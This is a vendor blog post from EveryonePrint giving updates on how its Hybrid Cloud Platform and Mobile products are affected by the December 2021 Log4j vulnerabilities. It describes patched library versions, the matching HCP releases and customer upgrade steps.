A recent critical vulnerability identified with Log4j has been addressed in 3.18
Rashid Maknin 17 Dec 2021

On December 9, 2021, a very serious vulnerability in the popular Java-based logging package Log4j was disclosed.

This vulnerability allows an attacker to execute code on a remote server, a so-called Remote Code Execution (RCE). Because of the widespread use of Java and Log4j, this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock.

It is CVE-2021-44228 and affects version 2 of Log4j between versions 2.0-beta-9 and 2.14.1. It is patched in 2.15.0.

[UPDATE from 17 December 2021] An additional vulnerability was found in Log4j version 2.15. It is now patched in 2.16.

[UPDATE from 21 December 2021] An additional vulnerability was found in Log4j version 2.16. It is now patched in 2.17.

EveryonePrint Hybrid Cloud Platform (HCP)

EveryonePrint HCP uses Java-based software and Log4j version 2.

Immediately when this vulnerability was discovered, and a patched version 2.15 was ready, we implemented it in HCP and are happy to report that it has already been included in a live production of EveryonePrint HCP version 3.18.2 which was released on Saturday, December 11, 2021.

We strongly recommend customers having HCP secondary gateways or running HCP in private clouds, update their HCP installations as soon as possible.

Secondary HCP gateways can be upgraded remotely from within the HCP admin Web UI and the Servers screen under the customer account. More information on updating secondary gateways can be found in documentation section 5.20.1. Remote Update of Secondary Gateways

Customers using private cloud installation can do simple over the top upgrades. More information can be found in section 4.6. Update a server of the documentation.

[UPDATE from 17 December 2021] HCP 3.18 has been upgraded to log4j version 2.16. Although the vulnerability identified does not affect HCP, our team wants to ensure HCP is up-to-date with the latest security enhancements for the log4j library. We advise all our partners with HCP secondary gateways and HCP private clouds to upgrade to HCP 3.18.3.

[UPDATE from 21 December 2021] HCP 3.18 has been upgraded to log4j version 2.17. Although the vulnerability identified does not affect HCP, our team wants to ensure HCP is up-to-date with the latest security enhancements for the log4j library. We advise all our partners with HCP secondary gateways and HCP private clouds to upgrade to HCP 3.18.4.

[UPDATE from 5 January 2022]  Log4j have released a further release, 2.17.1, to address vulnerability CVE-2021-44832. The vulnerability identified requires administration access to servers to take advantage of this vulnerability. As administration access to our servers is securely controlled, HCP is not at risk of this vulnerability and we, therefore, will not be releasing a hotfix for this latest Log4j version but instead will be including it in our next release, 3.19.

EveryonePrint Mobile

EveryonePrint also uses Java-based software, but Log4j version 1. This version is not vulnerable to the CVE-2021-44228; however, an upgrade to Log4j 2.16 is being investigated.

[UPDATE from 21 December 2021] EveryonePrint also uses Java-based software, but Log4j version 1. This version is not vulnerable to the vulnerabilities identified in log4j versions 2.15-2.17 and does not require an upgrade.

Related Knowledge Base Articles

Click the links below to learn more about the Log4j vulnerability:

Log4j Vulnerability

How to protect against log4j vulnerability if I can’t upgrade HCP

Timeline and Release Update:

  • 11 December 2021: CVE-2021-44228 / log4j version 2.15 / HCP 3.18.2
  • 17 December 2021: CVE-2021-45046 / log4j version 2.16 / HCP 3.18.3
  • 21 December 2021: CVE-2021-45105 / log4j version 2.17 / HCP 3.18.4
Ready to get started?
Try for free